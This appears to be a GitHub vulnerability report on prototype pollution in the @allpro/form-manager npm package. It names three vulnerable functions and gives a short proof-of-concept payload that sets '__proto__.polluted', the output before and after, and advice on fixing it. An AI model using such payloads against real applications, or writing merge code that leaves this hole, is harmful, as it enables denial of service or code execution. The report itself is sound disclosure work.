You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The module is vulenrable via three functions: , located at setDefaults (form-manager/cjs/index.js:1299), mergeBranch (form-manager/cjs/index.js:1249), and Object.setObjectValue (form-manager/cjs/index.js:1536) respectively. In all these implementations, the assignment of the property from source to destination occurred without proper protection.
An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties __proto__ or constructor.prototype.
Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
PoC:
(async()=>{constlib=awaitimport('@allpro/form-manager');varBAD_JSON=JSON.parse('{"__proto__":{"polluted":true}}');varvictim={}console.log("Before Attack: ",JSON.stringify(victim.__proto__));try{// uncomment one at a timelib.default.defaultsDeep({},BAD_JSON)//lib.default.merge ({}, BAD_JSON)//lib.default.setObjectValue ({}, "__proto__.polluted", true)}catch(e){}console.log("After Attack: ",JSON.stringify(victim.__proto__));deleteObject.prototype.polluted;})();
Output:
Before Attack: {}
After Attack: {"polluted":true}
Output of a successful fix:
Before Attack: {}
After Attack: {}
How to prevent:
Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names __proto__ or constructor assigned. Other recommendations at Snyk.io: https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b
The text was updated successfully, but these errors were encountered:
Overview
The module is vulenrable via three functions: , located at
setDefaults (form-manager/cjs/index.js:1299),mergeBranch (form-manager/cjs/index.js:1249), andObject.setObjectValue (form-manager/cjs/index.js:1536)respectively. In all these implementations, the assignment of the property from source to destination occurred without proper protection.An attacker can be exploit this method to copy malicious property to the built-in Object.prototype through the special properties
__proto__orconstructor.prototype.Thus, the attacker can use one of these properties to pollute the application logic that can be escalated to Denial of service,
remote code execution or cross-site scripting attacks.
PoC:
Output:
Before Attack: {} After Attack: {"polluted":true}Output of a successful fix:
Before Attack: {} After Attack: {}How to prevent:
Assign or copy a property should only be applied an own property of the destination object, thus, check for that (e.g using hasOwnProperty) is sufficient. Alternatively, block the property names
__proto__orconstructorassigned. Other recommendations at Snyk.io:https://learn.snyk.io/lesson/prototype-pollution/#a0a863a5-fd3a-539f-e1ed-a0769f6c6e3b
The text was updated successfully, but these errors were encountered: